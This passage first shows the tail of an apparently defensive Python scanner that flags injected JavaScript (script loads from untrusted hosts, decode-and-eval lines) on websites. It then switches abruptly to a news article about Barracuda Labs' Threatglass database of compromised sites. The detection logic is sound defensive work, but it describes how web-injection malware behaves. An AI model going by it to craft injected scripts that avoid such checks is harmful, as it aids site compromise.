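if __name__ == "__main__":
    for hit in scan_js_text(SAMPLE_JS, TRUSTED_HOSTS):
        print(f"line {hit['line']}: {hit['reason']} {hit['host'] or ''} :: {hit['snippet']}")
```

Line 3 of the sample loads a script from an allowlisted partner host and is left alone; line 4 loads one from an unknown host and line 6 decodes and evaluates a string, and both are reported. In practice, run `scan_directory` over the document root and compare hits against a known-good checkout or file hashes, since a line that is genuinely part of the site will show up in version control and an injected one will not.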
  20. Trying to enumerate the compromised sites on the Internet is a Sisyphean task. Luckily, it’s not a task that anyone really needs to perform any longer, especially now that Barracuda Labs has released its new Threatglass tool, a Web-based frontend that allows users to query a massive database of compromised sites to get detailed information on the malicious activity and the threats to visitors to those sites.

Barracuda has been using its technology to scan millions of Web sites every week, looking for malicious activity on legitimate sites. Typically, the tools scan the Alexa top 25,000 sites, along with other suspicious sites. The system hits the sites using a normal browser and waits to see what kind of actions the sites may take, looking for malicious activity like sites serving exploits or trying to download files to visitors’ machines. Now, the company has built a GUI for this system and exposed it to the Web so that users and researchers can search the database, dating back to 2011, looking for current or historic compromise data. Threatglass is set up to give users a variety of information about a given compromised site, including the number of URLs requested and whether the site downloads a binary. The tool also enables researchers to download a packet capture for a given site.

“Threatglass provides detailed information of what happened when visiting each of the infected websites on a given date, such as the screenshots of the browser, whether a binary was downloaded or any emails were sent, and the number of domains and objects requested. Meanwhile, the requested URLs and anomalous netflow information are presented on each of the infection incident reports. Most importantly, the network package captured during the whole visiting process is freely downloadable, which we’ve found to be well received by many security researchers in the community,” Barracuda Labs said in a blog post. “With various representations of network traffic including DNS, HTTP, and netflow in both graphical and textual formats displayed to users, we believe that this tool can greatly help casual users to know which websites had been infected, explore how infected websites could damage their browsers and computers, and understand the trending volumes and impacts of malicious websites on the Internet.”

The site’s format also allows users to browse through the most recent group of compromised sites on the home page in a tiled format. The screenshots on the site are obscured until users manually move the window shade, mainly because a good portion of compromised sites contain adult content. Barracuda Labs often comes across well-known, highly trafficked sites that have been compromised, including the recent example of Cracked.com, the popular humor site. The site, which is ranked in the Alexa top 300, was found to be compromised last fall and was still serving malware earlier this year. The malicious component on the site was serving exploits to visitors via JavaScript. Barracuda also discovered similar compromises of PHP.net and the Hasbro site. Users of Threatglass also can submit suspicious URLs to Barracuda through the site. Source